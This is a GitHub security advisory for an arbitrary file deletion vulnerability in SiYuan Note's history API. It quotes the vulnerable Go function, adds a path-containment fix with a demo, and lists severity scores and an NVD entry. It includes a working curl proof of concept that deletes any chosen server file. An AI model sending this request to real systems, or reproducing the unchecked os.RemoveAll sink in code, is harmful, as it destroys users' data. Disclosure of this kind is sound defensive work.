GHSA-8fx8-pffw-w498

Published: 03 Jan 2025
Source: github
GitHub: reviewed
CVSS4: 8.7

Description

SiYuan has an arbitrary file deletion vulnerability

Summary

An arbitrary file deletion vulnerability has been identified in the latest version of Siyuan Note. The vulnerability exists in the POST /api/history/getDocHistoryContent endpoint. An attacker can craft a payload to exploit this vulnerability, resulting in the deletion of arbitrary files on the server.

Details

The vulnerability can be reproduced by sending a crafted request to the /api/history/getDocHistoryContent endpoint.

Sending a request to /api/history/getDocHistoryContent such as:

curl "http://127.0.0.1:6806/api/history/getDocHistoryContent" -X POST -H "Content-Type: application/json" -d '{"historyPath":"<abs_filepath_of_a_file>"}'

Replace <abs_filepath_of_a_file> with the absolute file path of the target file you wish to delete.

The historyPath parameter in the payload is handled by the function getDocHistoryContent in api/history.go:133.

In turn, historyPath is passed to the function GetDocHistoryContent located in model/history.go:150, which is the sink of the vulnerability.

If the file at historyPath exists and filesys.ParseJSONWithoutFix fails to parse it, the file is deleted with os.RemoveAll:

```go
func GetDocHistoryContent(historyPath, keyword string, highlight bool) (id, rootID, content string, isLargeDoc bool, err error) {
	if !gulu.File.IsExist(historyPath) {
		logging.LogWarnf("doc history [%s] not exist", historyPath)
		return
	}

	// historyPath comes straight from the request body; it is read as given.
	data, err := filelock.ReadFile(historyPath)
	if err != nil {
		logging.LogErrorf("read file [%s] failed: %s", historyPath, err)
		return
	}

	isLargeDoc = 1024*1024*1 <= len(data)
	luteEngine := NewLute()
	historyTree, err := filesys.ParseJSONWithoutFix(data, luteEngine.ParseOptions)
	if err != nil {
		// Sink: any existing file that does not parse as a history document is removed.
		logging.LogErrorf("parse tree from file [%s] failed, remove it", historyPath)
		os.RemoveAll(historyPath)
		return
	}
	...
}
```
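The defensive property missing at that sink is path containment: the request-supplied path must resolve to a file inside the history directory before anything is read or removed. The following is an added example written for this page, not SiYuan's own code and not the fixing commit (which is referenced by the NVD entry below but whose diff is not reproduced here). It assumes a hypothetical trusted history root passed in as historyDir, uses the hypothetical names ResolveHistoryPath, RemoveIfUnparsable and jsonParse, and substitutes json.Valid for filesys.ParseJSONWithoutFix; the temporary files it creates are constructed for the demonstration.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// ErrOutsideHistory is returned when the requested path does not resolve to a
// file inside the history directory.
var ErrOutsideHistory = errors.New("historyPath is outside the history directory")

// inside reports whether p is strictly below base: not base itself, and not a
// sibling that merely shares a name prefix (history2/ next to history/).
func inside(base, p string) bool {
	rel, err := filepath.Rel(base, p)
	if err != nil || rel == "." || rel == ".." {
		return false
	}
	return !strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

// ResolveHistoryPath is a hypothetical containment check (assumption: not
// SiYuan's code). historyDir is the trusted history root; historyPath is the
// value taken from the request. Both are made absolute and symlink-resolved
// before the comparison, so neither "../" segments nor a symlink planted under
// the history directory can steer the caller to a file elsewhere. A path that
// does not exist is reported with the *os.PathError from EvalSymlinks, which
// keeps the original "not exist" early return.
func ResolveHistoryPath(historyDir, historyPath string) (string, error) {
	base, err := filepath.Abs(historyDir)
	if err != nil {
		return "", err
	}
	base, err = filepath.EvalSymlinks(base)
	if err != nil {
		return "", err
	}
	candidate := historyPath
	if !filepath.IsAbs(candidate) {
		candidate = filepath.Join(base, candidate)
	}
	resolved, err := filepath.EvalSymlinks(filepath.Clean(candidate))
	if err != nil {
		return "", err
	}
	if !inside(base, resolved) {
		return "", ErrOutsideHistory
	}
	return resolved, nil
}

// RemoveIfUnparsable mirrors the "parse failed, remove it" branch of the
// vulnerable function, but only after containment is proven, and with
// os.Remove instead of os.RemoveAll because a history entry is a single file.
// parse is the caller's parser, standing in for filesys.ParseJSONWithoutFix.
func RemoveIfUnparsable(historyDir, historyPath string, parse func([]byte) error) (removed bool, err error) {
	p, err := ResolveHistoryPath(historyDir, historyPath)
	if err != nil {
		return false, err
	}
	data, err := os.ReadFile(p)
	if err != nil {
		return false, err
	}
	if parse(data) != nil {
		return true, os.Remove(p)
	}
	return false, nil
}

// jsonParse is a stand-in parser: any syntactically valid JSON passes.
func jsonParse(b []byte) error {
	if !json.Valid(b) {
		return errors.New("not valid JSON")
	}
	return nil
}

func main() {
	// Constructed layout: <tmp>/history/broken.sy (corrupt) and <tmp>/secret.txt (outside).
	root, _ := os.MkdirTemp("", "siyuan-demo")
	defer os.RemoveAll(root)
	hist := filepath.Join(root, "history")
	_ = os.Mkdir(hist, 0o755)
	_ = os.WriteFile(filepath.Join(hist, "broken.sy"), []byte("{not json"), 0o644)
	_ = os.WriteFile(filepath.Join(root, "secret.txt"), []byte("keep me"), 0o644)

	// Only the corrupt file inside history/ is removed; both escapes are refused.
	for _, req := range []string{filepath.Join(hist, "broken.sy"), "../secret.txt", filepath.Join(root, "secret.txt")} {
		removed, err := RemoveIfUnparsable(hist, req, jsonParse)
		fmt.Printf("%s: removed=%v err=%v\n", req, removed, err)
	}
}
```

The check resolves symlinks on both sides before comparing, because a textual prefix test on the cleaned path alone is defeated by a link under the history directory that points outside it; a path that does not exist yields an os.ErrNotExist error rather than a containment error, so callers can keep logging it the way the original does.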

PoC

curl "http://127.0.0.1:6806/api/history/getDocHistoryContent" -X POST -H "Content-Type: application/json" -d '{"historyPath":"<abs_filepath_of_a_file>"}'

Impact

Arbitrary file deletion vulnerability.

Packages

Name: github.com/siyuan-note/siyuan/kernel (go)
Affected versions / Fixed version: not listed

EPSS

Percentile: 62%
Score: 0.00432
Low

CVSS4: 8.7 High

Weaknesses (CWE)

CWE-459
CWE-552

Related vulnerabilities

CVSS3: 9.1
nvd
about 1 year ago

SiYuan is self-hosted, open source personal knowledge management software. SiYuan Note version 3.1.18 has an arbitrary file deletion vulnerability. The vulnerability exists in the `POST /api/history/getDocHistoryContent` endpoint. An attacker can craft a payload to exploit this vulnerability, resulting in the deletion of arbitrary files on the server. Commit d9887aeec1b27073bec66299a9a4181dc42969f3 fixes this vulnerability and is expected to be available in version 3.1.19.

suse-cvrf
about 1 year ago

Security update for govulncheck-vulndb
